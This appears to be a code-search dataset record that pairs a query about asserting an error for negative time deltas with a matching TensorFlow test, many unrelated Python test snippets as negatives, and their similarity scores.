main_module.get_function(\"adj_complex_conj\")\n\tsubsample_kernel = main_module.get_function(\"subsample\")\n\tvelocity_kernel = main_module.get_function(\"set_velocity\")\n\tpspec_texture = main_module.get_texref(\"pspec\")\n\n\tinterpPspec, interpSize = init_pspec() #interpPspec contains both k array and P array\n\tinterp_cu = cuda.matrix_to_array(interpPspec, order='F')\n\tcuda.bind_array_to_texref(interp_cu, pspec_texture)\n\n\tlargebox_d = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d, np.int32(DIM), block=block_size, grid=grid_size)\n\n\t#import IPython; IPython.embed()\n\tlargebox_d_imag = gpuarray.zeros(shape, dtype=np.float32)\n\tinit_kernel(largebox_d_imag, np.int32(DIM), block=block_size, grid=grid_size)\n\n\tlargebox_d *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d_imag *= MRGgen.gen_normal(shape, dtype=np.float32)\n\tlargebox_d = largebox_d + np.complex64(1.j) * largebox_d_imag\n\n\t#adj_complex_conj(largebox_d, DIM, block=block_size, grid=grid_size)\n\tlargebox = largebox_d.get()\n\t#np.save(parent_folder+\"/Boxes/deltak_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox)\n\n\t#save real space box before smoothing\n\tplan = Plan(shape, dtype=np.complex64)\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tnp.save(parent_folder+\"/Boxes/deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(DIM, BOX_LEN), largebox_d.real.get_async())\n\n\t#save real space box after smoothing and subsampling\n\t# host largebox is still in k space, no need to reload from disk\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tHII_filter(largebox_d, N, ZERO, smoothR, block=block_size, grid=grid_size);\n\tplan.execute(largebox_d, inverse=True) #FFT to real space of smoothed box\n\tlargebox_d /= scale**3\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tsubsample_kernel(largebox_d.real, smallbox_d, N, HII_DIM, PIXEL_FACTOR, block=block_size, grid=HII_grid_size) #subsample in real 
space\n\tnp.save(parent_folder+\"/Boxes/smoothed_deltax_z0.00_{0:d}_{1:.0f}Mpc\".format(HII_DIM, BOX_LEN), smallbox_d.get_async())\n\n\t# reload the k-space box for velocity boxes\n\tlargebox_d = gpuarray.to_gpu(largebox)\n\t\n\t#largebox_d /= VOLUME #divide by VOLUME if using fft (vs ifft)\n\tsmoothR = np.float32(L_FACTOR*BOX_LEN/HII_DIM)\n\tlargevbox_d = gpuarray.zeros((DIM,DIM,DIM), dtype=np.complex64)\n\tsmallbox_d = gpuarray.zeros(HII_shape, dtype=np.float32)\n\tfor num, mode in enumerate(['x', 'y', 'z']):\n\t\tvelocity_kernel(largebox_d, largevbox_d, DIM, np.int32(num), block=block_size, grid=grid_size)\n\t\tHII_filter(largevbox_d, DIM, ZERO, smoothR, block=block_size, grid=grid_size)\n\t\tplan.execute(largevbox_d, inverse=True)\n\t\tlargevbox_d /= scale**3\n\t\t#import IPython; IPython.embed()\n\t\tsubsample_kernel(largevbox_d.real, smallbox_d, DIM, HII_DIM,PIXEL_FACTOR, block=block_size, grid=HII_grid_size)\n\t\tnp.save(parent_folder+\"/Boxes/v{0}overddot_{1:d}_{2:.0f}Mpc\".format(mode, HII_DIM, BOX_LEN), smallbox_d.get())\n\n\treturn", "def __init__(self,args, variance_epsilon=1e-12):\n super(BERTLayerNorm, self).__init__()\n self.gamma = nn.Parameter(torch.ones(args.input_dim))\n self.beta = nn.Parameter(torch.zeros(args.input_dim))\n self.variance_epsilon = variance_epsilon", "def testMask2D(self):\n mask = np.ones((3, 3), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(5, 5, 5, 5, 5))\n conv1 = snt.Conv3D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 135 * np.ones((5, 3, 3, 3, 1), dtype=np.float32)\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def testInputTypeError(self, use_bias):\n conv1 = snt.SeparableConv2D(\n output_channels=3,\n channel_multiplier=1,\n kernel_shape=3,\n padding=snt.SAME,\n use_bias=use_bias,\n initializers=create_separable_constant_initializers(\n 1.0, 1.0, 1.0, use_bias))\n\n for dtype in (tf.uint32, tf.float64):\n x = tf.constant(np.ones([1, 5, 5, 1]), dtype=dtype)\n err = \"Input must have dtype tf.float.*\"\n with self.assertRaisesRegexp(TypeError, err):\n conv1(x)", "def testMaskErrorIncompatibleRank1(self):\n\n np_mask = np.ones((3,))\n x = tf.constant(0.0, shape=(2, 8, 6))\n\n # Test with both numpy arrays and Tensors.\n for mask in (np_mask, tf.convert_to_tensor(np_mask)):\n with self.assertRaises(snt.Error) as cm:\n snt.Conv1D(output_channels=4, kernel_shape=5, mask=mask)(x)\n self.assertTrue(str(cm.exception).startswith(\n \"Invalid mask shape: {}\".format(np_mask.shape)))", "def testKernelShape(self, out_channels, padding, use_bias, in_shape,\n out_shape, stride_shape, use_output_shape):\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3],\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n snt.Conv1DTranspose(\n output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=3,\n padding=padding,\n stride=stride_shape,\n name=\"conv1\",\n use_bias=use_bias)\n\n err = \"Invalid kernel\"\n with self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3],\n name=\"conv1\",\n use_bias=use_bias)\n\n with 
self.assertRaisesRegexp(snt.IncompatibleShapeError, err):\n snt.Conv1DTranspose(output_channels=out_channels,\n output_shape=out_shape if use_output_shape else None,\n kernel_shape=[3, 3, 3, 3],\n name=\"conv1\",\n use_bias=use_bias)", "def __init__(self):\n kernel=numpy.array([[-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]])\n VConvolutionFilter.__init__(self,kernel)", "def testMask3D(self):\n mask = np.ones((3, 3, 2), dtype=np.float32)\n inputs = tf.constant(1.0, shape=(1, 5, 5, 2))\n conv1 = snt.Conv2D(\n output_channels=1,\n kernel_shape=3,\n mask=mask,\n padding=snt.VALID,\n use_bias=False,\n initializers=create_constant_initializers(1.0, 0.0, use_bias=False))\n out = conv1(inputs)\n expected_out = 18 * np.ones((1, 3, 3, 1))\n with self.test_session():\n tf.variables_initializer([conv1.w]).run()\n self.assertAllClose(out.eval(), expected_out)", "def __init__(self, input_dim, variance=1., active_dims=None, ARD=False, name='basis func kernel'):\n super(BasisFuncKernel, self).__init__(input_dim, active_dims, name)\n assert self.input_dim==1, \"Basis Function Kernel only implemented for one dimension. Use one kernel per dimension (and add them together) for more dimensions\"\n self.ARD = ARD\n if self.ARD:\n phi_test = self._phi(np.random.normal(0, 1, (1, self.input_dim)))\n variance = variance * np.ones(phi_test.shape[1])\n else:\n variance = np.array(variance)\n self.variance = Param('variance', variance, Logexp())\n self.link_parameter(self.variance)", "def test_random_normal():\n tf.reset_default_graph()\n tf.random.set_random_seed(0)\n rnormal_class = INITIALIZER_REGISTRY['normal']\n rnormal_obj = rnormal_class({\"mean\":0.5, \"std\":0.1})\n tf_init = rnormal_obj.get_entity_initializer(init_type='tf')\n var1 = tf.get_variable(shape=(1000, 100), initializer=tf_init, name=\"var1\")\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n tf_var = sess.run(var1)\n np_var = rnormal_obj.get_entity_initializer(1000, 100, init_type='np')\n # print(np.mean(np_var), np.std(np_var))\n # print(np.mean(tf_var), np.std(tf_var))\n assert(np.round(np.mean(np_var),1)==np.round(np.mean(tf_var),1))\n assert(np.round(np.std(np_var),1)==np.round(np.std(tf_var),1))", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is the kernel\", kernel*sum_val)\n return kernel*sum_val", "def _init(module):\n classname = module.__class__.__name__\n if classname.find('Conv') != -1:\n try:\n nn.init.xavier_uniform_(module.weight.data)\n module.bias.data.fill_(0) # May fail.\n except AttributeError:\n pass", "def __init__(self, training_data, kernel, par_sigma, par_lambda):\n self.kernel = kernel\n self.par_sigma = par_sigma\n self.par_lambda = par_lambda\n self.training_data = training_data\n\n self.assert_data_shape(training_data)\n\n # train model\n k = self.kernel.get_kernel_matrix(training_data[0], training_data[0])\n u = scipy.linalg.cholesky(k + self.par_lambda * numpy.identity(k.shape[0]))\n beta = scipy.linalg.solve_triangular(u, training_data[1], trans='T')\n alpha = scipy.linalg.solve_triangular(u, beta)\n\n self.alpha = alpha.reshape(alpha.size, 1)\n self.u = u", "def 
test_regressors_error_without_target(sampling_method, RegressorKernelClass):\n boston = load_boston()\n\n with pytest.raises(ValueError):\n RegressorKernelClass(random_state=123).fit(boston.data)", "def test_inverted_variance(self):\n num_x = 150\n num_y = 100\n x_vals = np.linspace(0, 2 * np.pi, num_x)\n y_vals = (\n np.sin(x_vals[:num_y]) + 0.3 * np.random.randn(3, num_y) + 0.5)\n\n alpha = 1\n rmse_vals = []\n while True:\n try:\n y_pred_no_std = extrapolated_lowess(\n x_vals, y_vals.mean(axis=0), alpha=alpha)\n y_pred_with_std = extrapolated_lowess(\n x_vals, y_vals.mean(axis=0), alpha=alpha,\n y_std=y_vals.std(axis=0))\n\n # Ensure the use of standard-deviation has _some_ effect.\n assert not (y_pred_no_std == y_pred_with_std).all()\n\n y_rmse = root_mean_square_error(\n y_pred_with_std[:num_y], y_vals)\n rmse_vals.append(y_rmse)\n alpha -= 0.1\n except RuntimeError:\n # alpha is too small\n break\n except np.linalg.LinAlgError:\n # alpha is too small, resulted in singular matrix\n break\n\n # Ensure that with the use of standard-deviation doesn't prevent the\n # the fit from improving as some optimal alpha the RMSE is approached.\n assert len(rmse_vals) > 1\n assert (np.diff(np.array(rmse_vals)) < 0).all()", "def test_input_dimension(self):\n knn = Knn(n_neighbors=3)\n with self.assertRaises(ValueError): knn.fit(X_train, y_test)" ]
[ "0.64694107", "0.64663404", "0.63284683", "0.6302467", "0.60142285", "0.59726274", "0.5947721", "0.589947", "0.5893144", "0.589087", "0.5890487", "0.581995", "0.5760517", "0.57496685", "0.57280266", "0.5705864", "0.56650275", "0.5636754", "0.56325996", "0.56217444", "0.5600975", "0.5580089", "0.55646473", "0.5543633", "0.55286956", "0.5527734", "0.54987717", "0.5497852", "0.5476786", "0.5471861", "0.54651177", "0.54583573", "0.54377204", "0.5427197", "0.5398238", "0.5388321", "0.5366382", "0.5350962", "0.53482103", "0.534476", "0.53377503", "0.533679", "0.5300868", "0.5293731", "0.529332", "0.52679265", "0.5263247", "0.5260239", "0.5258857", "0.52582806", "0.5254969", "0.52490926", "0.52479935", "0.52441", "0.5243058", "0.5242397", "0.52362925", "0.52347744", "0.52347744", "0.5233527", "0.5224529", "0.52233964", "0.5220286", "0.52185374", "0.52142924", "0.5204711", "0.52029204", "0.5191662", "0.5189538", "0.5187917", "0.5178857", "0.5178784", "0.5175907", "0.51749945", "0.5174454", "0.51677895", "0.51650244", "0.5164427", "0.5160126", "0.5152518", "0.51464325", "0.5145921", "0.51407474", "0.513877", "0.5138092", "0.5134772", "0.5134417", "0.51339734", "0.51333207", "0.5132253", "0.5123863", "0.51216686", "0.5121536", "0.5117958", "0.511288", "0.51115364", "0.5108417", "0.51058435", "0.5105715", "0.51053727" ]
0.6615188
0
Test that the assertion fires for a negative delta time
def test_to_delta_time_positive_difference(with_tf_random_seed, np_time_points): time_points = tf.constant(np_time_points, dtype=default_float()) with pytest.raises(InvalidArgumentError) as exp: to_delta_time(time_points) assert exp.value.message.find("Condition x >= y") >= 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_timeout_elapsed_no_exception(self):\n deadline = Deadline(-MS)\n timeout = deadline.timeout(raise_if_elapsed=False)\n self.assertGreater(timeout, -2 * MS)\n self.assertLess(timeout, -MS)", "def test_negative_timedelta(self):\n @converters.wrap\n def inner_test(param: datetime.timedelta):\n \"\"\"This shouldn't be called, converting should fail.\"\"\"\n pass\n self.assert_raises_request_error(\n lambda: inner_test(param='-60'), 3117\n )", "def test_validate_delta():\n with pytest.raises(ValueError):\n validate_delta(1.1)\n\n with pytest.raises(ValueError):\n validate_delta(-0.1)\n\n assert validate_delta(0.1) == 0.1", "def test_timestamp_minus(self, mock):\n mock.configure_mock(**(self.config_payload(-1, -2)))\n self.assertRaises(\n AssertionError,\n lf.lambda_handler, event=self.lambdaevent, context=None)\n mock.client.return_value.update_thing_shadow.assert_not_called()", "def _badness(self, time):\n return (time - self.expected_time)**2", "def test_subtract_all_args_less_zero(self):\n try:\n self.assertEqual(subtract(-18, -5), -13)\n except Exception as error:\n print(error)", "def test_negative_interval(self, Signal):\n blk = ElapsedTime()\n config = {\n 'enrich': {\n 'exclude_existing': True,\n },\n 'units': {\n 'days': '{{ $days }}',\n 'hours': '{{ $hours }}',\n 'minutes': '{{ $minutes }}',\n 'seconds': '{{ $seconds }}',\n },\n 'timestamp_a': self.timestamp_b,\n 'timestamp_b': self.timestamp_a,\n }\n self.configure_block(blk, config)\n\n # process a list of signals\n blk.start()\n blk.process_signals([\n # the default case\n Signal({\n 'days': False,\n 'hours': False,\n 'minutes': False,\n 'seconds': True,\n }),\n # all units\n Signal({\n 'days': True,\n 'hours': True,\n 'minutes': True,\n 'seconds': True,\n }),\n ])\n blk.stop()\n\n # check output\n self.assert_last_signal_list_notified([\n Signal({\n 'seconds': self.total_seconds * -1,\n }),\n Signal({\n 'days': -1,\n 'hours': -12,\n 'minutes': -42,\n 'seconds': -3.142,\n }),\n ])", "def assert_timeout(self) -> None:", "def inner_test(param: datetime.timedelta):\n self.assertEqual(param, datetime.timedelta(\n days=3, hours=2, minutes=5, seconds=43\n ))", "def test_negation(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n\n a2 = -a1\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], -1, 2, -3, 4))", "def test9(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_delta_minus(self):\n d = Delta(\"-50\")\n self.assertEqual(d.cmp(0, 50), False)\n self.assertEqual(d.cmp(51, 0), True)\n self.assertEqual(d.cmp(5, 10), False)\n d = Delta(\"-50=\")\n self.assertEqual(d.cmp(50, 0), True)\n d = Delta(\"-50%\")\n self.assertEqual(d.cmp(25, 10), True)\n self.assertEqual(d.cmp(10, 25), False)", "def test_t(self):\n assert np.isclose(self.stepper.t, self.final_t)", "def test_subtract_zero_arg(self):\n try:\n self.assertEqual(subtract(0, -6), 7)\n except Exception as error:\n print(f'Got error in {inspect.stack()[0][3]}, {error}')", "def test_negative(self):\n self.assertFalse(validate_measure_input('-1', self.measures))", "def test_subtract_all_args_greater_zero(self):\n try:\n self.assertEqual(subtract(30, 16), 15)\n except Exception as error:\n print(f'Got error in {inspect.stack()[0][3]}, {error}')", "def test_bad_interval(self):\n # Intentionally set a small interval (3 min) to fail.\n interval = np.timedelta64(3, 'm')\n self.assertFalse(utils.check_timestamps(self.times, interval))", "def 
test_mock_monotonic_clock__raises_on_negative_step() -> None:\n clock = MockMonotonicClock(0)\n with raises(ClockError):\n clock.step_size = -1", "def test8(self):\n sig1 = np.array([1, 0, 0, 0])\n sig2 = np.array([0, 1, ])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_duration_argument_is_negative(self):\n with self.assertRaises(ValueError) as cm:\n DurationMixin(duration=-10)\n\n self.assertEqual(\n cm.exception.message,\n 'DurationMixin.duration should be an non-negative float'\n )", "def check_time():\n times = get_times()\n time_difference = abs((times['local'] - times['target']).total_seconds())\n return time_difference < post_time_tol_seconds", "def assert_TPVE(self, *args, **kw):\n return self.assertRaises(TimeParserValueError, *args, **kw)", "def inner_test(param: datetime.timedelta):\n pass", "def test_total_time_no_end_time(time_record_factory):\n d = datetime.datetime(2018, 10, 1, 15, 26)\n t = time_record_factory(time_start=d, time_end=None)\n expected = datetime.timedelta(0)\n assert t.total_time == expected", "def test4(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 0, 1])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == -1)", "def test_with_now_minus_2_days(self):\n self.assertEqual(ageid(self.now - timedelta(2)), 'age3')", "def test_debt_target_expired(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\", issue_ids=[\"FOO-40\"]),\n count={\"debt_target\": \"100\"},\n issue_status=[{\"status_category\": \"done\", \"issue_id\": \"FOO-40\"}],\n )\n self.assertTrue(measurement.debt_target_expired())", "def test_minus(self):\n print('test_minus');\n self.assertEqual(90, minus(100, 10))", "def test_parse_time_with_invalid_interval(self):\n now = datetime(2015, 2, 1, 0, 0, 0)\n self.assert_TPVE(parse_time, \"-0\", now)\n self.assert_TPVE(parse_time, \"-12\", now)\n self.assert_TPVE(parse_time, \"-12fortnights\", now)\n self.assert_TPVE(parse_time, \"-20150101\", now)", "def test_duration_attribute_is_negative(self):\n d = DurationMixin(duration=10)\n\n with self.assertRaises(ValueError) as cm:\n d.duration = -10\n\n self.assertEqual(\n cm.exception.message,\n 'DurationMixin.duration should be an non-negative float'\n )", "def test_minus(self):\n self.assertEqual(1, minus(3, 2))", "def test_issue_delete_time(self):\n pass", "def test_debt_target_not_expired(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\"),\n count={\"debt_target\": \"100\"},\n issue_status=[],\n )\n self.assertFalse(measurement.debt_target_expired())", "def test_invalid_time_in_past(event_member):\n _, member, event_id = event_member\n past = date.today() - timedelta(days=5)\n start = datetime.combine(past, time(15, 0))\n end = start + timedelta(days=8)\n expect_error(edit, InputError, member.username, event_id,\n True, start, end)", "def test_subtraction():\n assert calculator.subtract(7, 3) == 4\n assert calculator.subtract(7.0, 3.0) == 4.0\n assert calculator.subtract(7, -3) == 10\n assert calculator.subtract(7.0, -3.0) == 10.0", "def test_time(self):\r\n pass", "def test_invalid_time_too_late(event_member):\n _, member, event_id = event_member\n current = date.today() + timedelta(days=1)\n start = (datetime.combine(current, time(16, 30)) +\n timedelta(days=(MAX_DAYS - 2)))\n end = start + timedelta(days=5)\n expect_error(edit, InputError, member.username, event_id,\n True, start, end)", "def test_travel_full_down(self):\n travelcalculator = 
TravelCalculator(25, 50)\n with patch(\"time.time\") as mock_time:\n mock_time.return_value = 1580000000.0\n travelcalculator.set_position(20)\n travelcalculator.start_travel_down()\n\n mock_time.return_value = 1580000019.0\n assert not travelcalculator.position_reached()\n assert not travelcalculator.is_closed()\n assert not travelcalculator.is_open()\n\n mock_time.return_value = 1580000020.0\n assert travelcalculator.position_reached()\n assert travelcalculator.is_closed()\n assert not travelcalculator.is_open()", "def test2(self):\n sig1 = np.array([0, 1, 0, 0])\n sig2 = np.array([0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_negative():\n assert is_leap_year(2010) is False", "def assert_almost_equal(self, val1, val2, delta):\n return self.assertTrue(\n 0 <= abs(val1 - val2) <= delta,\n \"Absolute difference of {} and {} ({}) is not within {}\".format(\n val1,\n val2,\n abs(val1-val2),\n delta,\n ),\n )", "def test_timeout_elapsed_exception(self):\n deadline = Deadline(-MS)\n with self.assertRaises(TimeoutError):\n deadline.timeout()", "def test_decimal_time(self):\n test_time = random.random() * 24\n test_string = \"AndyTimeZT{0}\".format(test_time)\n expected = test_time\n computed = self.parser.extract_zt(test_string)\n delta = computed - expected\n self.assertTrue(delta < 0.001)", "def test_out_of_date(self):\n self.assertTrue(update_available(0.0))", "def test_with_now_minus_1_day(self):\n self.assertEqual(ageid(self.now - timedelta(1)), 'age2')", "def test_datetime(self):\n diff = self.machine_date - self.actual_date < datetime.timedelta(0, 20, 0)", "def verify_event_timing(self, event, item):\n return True", "def pytest_timeout_cancel_timer(item):", "def check_diff(self,game,wanted_diff,wanted_starting_time=''):\n return True", "def test_with_now_minus_3_days(self):\n self.assertEqual(ageid(self.now - timedelta(3)), 'age4')", "def test_new_log_diff():\n assert get_clip(audlist, log, 1) != get_clip(audio['NTF'], log, 1)", "def test_absolute_truth():\n assert True", "def test_neg():\n # Test for negation with scalar Rnode object\n x = Rnode(5.0)\n z = -x\n try:\n assert z.value == -1 * x.value\n except AssertionError as e:\n print(e)\n raise AssertionError", "def test_minus(self):\n self.assertEqual(1, foo.minus(3, 2))", "def test_queryset_with_deltas(time_record_factory):\n now = timezone.now()\n time_record_factory(time_start=now)\n t1 = time_record_factory(\n time_end=now + datetime.timedelta(days=1),\n time_start=now,\n )\n t2 = time_record_factory(\n time_end=now + datetime.timedelta(hours=1),\n time_start=now,\n )\n\n records = models.TimeRecord.objects.with_deltas()\n\n # Only records with an end time should be included\n assert list(records) == [t1, t2]\n\n # Each record should be annotated with its delta\n for record in records:\n assert record.delta == record.time_end - record.time_start", "def test3(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 1, 0, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_no_timesteps_property(self):\n expected_values = {\n 'no_timesteps': 1000,\n 'no_sweeps': 10,\n 'no_channels': 4,\n }\n test_rec = rt.Recording(\n np.zeros(\n [\n expected_values['no_channels'],\n expected_values['no_timesteps'],\n expected_values['no_sweeps'],\n ]\n ),\n dt=0.1,\n )\n self.assertEqual(\n test_rec.no_timesteps,\n expected_values['no_timesteps'],\n 'Expected {} for `no_timesteps` property; got {} instead.'.format(\n expected_values['no_timesteps'], 
test_rec.no_timesteps\n ),\n )", "def test1(self):\n sig1 = np.array([0, 1, 0])\n sig2 = np.array([0, 1, 0])\n d, p = EventSync.estimate_delay(sig1, sig2)\n self.assertTrue(d == 0)", "def test_duration_argument_skipped(self):\n d = DurationMixin()\n self.assertEqual(d.duration, 0)", "def test_invalid(self):\n created = datetime.datetime(2019, 1, 1, tzinfo=datetime.timezone.utc)\n last_used = datetime.datetime(2019, 1, 2, tzinfo=datetime.timezone.utc)\n key = Key('user2', 'ldasfkk', 'Inactive', created, last_used)\n with pytest.raises(AssertionError):\n key.audit(5, 1, 1, 1)", "def test_start_before_end(self):\n start = timezone.now()\n end = start + timedelta(seconds=1)\n actual = validate_timeframe(start, end)\n expected = None\n self.assertEqual(actual, expected)", "def test_other_event(self):\n M = simulation.EventMonitor(self.G, event='other')\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n\n times = (~self.G.pattern).nonzero()[1]*self.dt\n self.assertTrue(np.allclose(sorted(times), M.t))\n for (i, t) in zip(M.i, M.t):\n self.assertFalse(self.G.pattern[i, int_r(t/self.dt)])", "def assert_timer_halfway(timer):\n if timer.clock.realtime:\n assert timer.elapsed >= 0.5 * timer.timeout\n assert timer.elapsed < timer.timeout\n else:\n assert math.isclose(timer.elapsed, 0.5 * timer.timeout)\n assert timer.running\n assert not timer.timed_out\n assert timer.remaining > 0\n if timer.clock.realtime:\n assert timer.remaining <= 0.5 * timer.timeout\n else:\n assert math.isclose(timer.remaining, 0.5 * timer.timeout)", "def test_base_period_tolerance(delta, expected):\n result = wrap(180 - delta)\n print(result, np.isclose(result, -180))\n assert np.isclose(result, -180)[0] == expected", "def test_debt_target_not_expired_when_new_issue_added(self):\n measurement = self.measurement(\n self.metric(accept_debt=True, debt_target=\"100\", issue_ids=[\"FOO-41\", \"FOO-42\"]),\n count={\"debt_target\": \"100\"},\n issue_status=[{\"status_category\": \"done\", \"issue_id\": \"FOO-41\"}],\n )\n self.assertFalse(measurement.debt_target_expired())", "def test_time_field():", "def mempool_assert_absolute_time_exceeds(condition: ConditionWithArgs, timestamp: uint64) -> Optional[Err]:\n try:\n expected_seconds = int_from_bytes(condition.vars[0])\n except ValueError:\n return Err.INVALID_CONDITION\n\n if timestamp is None:\n timestamp = uint64(int(time.time()))\n if timestamp < expected_seconds:\n return Err.ASSERT_SECONDS_ABSOLUTE_FAILED\n return None", "def test_long_run_case_that_we_want_to_skip():\n time.sleep(30)\n assert 0", "def test_is_expired_time_based(self):\n expired_dt = datetime.now() + timedelta(hours=-1)\n good_dt = datetime.now() + timedelta(hours=1)\n expired_pass = DoorPassFactory.create(device=self.device, expires_at=expired_dt)\n good_pass = DoorPassFactory.create(device=self.device, expires_at=good_dt)\n self.assertTrue(expired_pass.is_expired())\n self.assertFalse(good_pass.is_expired())", "def test_negative_stop(self):\n self.assertArrayEqual(self.dset[2:-2], self.arr[2:-2])", "def test_subtract(self):\n self.assertEqual(work_file.subtract(10, 5), 5)\n self.assertEqual(work_file.subtract(-1, 1), -2)\n self.assertEqual(work_file.subtract(-1, -1), 0)", "def test_general_subset_invalid_time():\n pass", "def test_hours():\n assert_equal(datetime.timedelta(hours=1), convert_delta(\"1h\"))", "def test_timestep(self):\n class Mock(object):\n def __init__(self):\n self.t = 0.0\n self.dt = None\n\n def evolve(self1, t, dt):\n if self1.dt is not None:\n 
self.assertAlmostEqual(self1.dt, dt)\n else:\n self1.dt = dt\n\n self.assertAlmostEqual(self1.t, t)\n\n self1.t += self1.dt\n\n t_max = 10.0\n dt = 0.2\n\n G = Mock()\n simulation.Simulation(G, dt=dt).run(t_max)\n self.assertAlmostEqual(G.dt, dt)", "def test_failed():\n assert False", "def test_setDeadlineTwice(self):\n self.session.setDeadline(10.0)\n self.session.setDeadline(9.0)\n decreased = self.session.getRemainingTime()\n self.session.setDeadline(11.0)\n still_decreased = self.session.getRemainingTime()\n self.assertEqual((decreased, still_decreased), (9.0, 9.0))", "def test_blind_delete_with_datetime(self):\r\n uid = uuid4()\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n TestTimestampModel.get(id=uid).should.be.ok\r\n\r\n plus_five_seconds = datetime.now() + timedelta(seconds=5)\r\n\r\n TestTimestampModel.objects(id=uid).timestamp(plus_five_seconds).delete()\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)\r\n\r\n tmp = TestTimestampModel.create(id=uid, count=1)\r\n\r\n with self.assertRaises(TestTimestampModel.DoesNotExist):\r\n TestTimestampModel.get(id=uid)", "def test_timestamp():\n timestamp = 10\n timeorder = jhhalchemy.model.time_order.TimeOrderMixin()\n timeorder.timestamp = timestamp\n assert timeorder.time_order == -timestamp\n assert timeorder.timestamp == timestamp", "def test_issue_tracked_times(self):\n pass", "def test_timestamp_is_negative():\n mock_message.timestamp = Mock(return_value=(1, -1))\n new_message = Message(mock_message)\n\n assert new_message.value == mock_message.value()\n assert new_message._raw == mock_message\n assert new_message._meta.key == mock_message.key()\n assert new_message._meta.partition == mock_message.partition()\n assert new_message._meta.offset == mock_message.offset()\n assert new_message._meta.topic == mock_message.topic()\n assert new_message._meta.timestamp is None\n assert new_message._meta.datetime is None", "def test_ensure_not_ts_pass(self):\n self.assertEqual(ensure_not_ts(self.jobset1), 'completed')", "def test_time_lapse(self):\n t0 = time.time()\n time.sleep(2)\n lap = time_lapse(t0)\n self.assertEqual(lap, '00:00:02')", "def test_warped():\n today = arrow.utcnow().to('local')\n assert (humanize_arrow_date(today.isoformat())=='Tomorrow')\n yesterday = today.replace(days =-1)\n assert (humanize_arrow_date(yesterday.isoformat())=='Today')\n before_yesterday = yesterday.replace(days=-1)\n assert(humanize_arrow_date(before_yesterday.isoformat())=='Yesterday')", "def test_UniformTime_repr():", "def test_timestamp_backward(self, mock):\n mock.configure_mock(**(self.config_payload(0, 1)))\n self.assertRaises(\n AssertionError,\n lf.lambda_handler, event=self.lambdaevent, context=None)\n mock.client.return_value.update_thing_shadow.assert_not_called()", "def test_time(self):\n M = simulation.StateMonitor(self.G, 'v')\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, self.dt)))", "def test_timestamps(self):\n test_particle = self.TestDataParticle(self.sample_raw_data,\n preferred_timestamp=DataParticleKey.PORT_TIMESTAMP,\n internal_timestamp=self.sample_internal_timestamp)\n\n self.assertRaises(SampleException, test_particle.generate_raw)", "def test_fall_back(self):\n # Exact crossover time:\n # datetime.datetime(2011, 11, 6, 2, 0, 0, tzinfo=pytz.utc)\n # This test will use times on either side of it.\n\n # From the PDT vantage point, the run time is 24.2 and 48.2 hours away:\n s1a, 
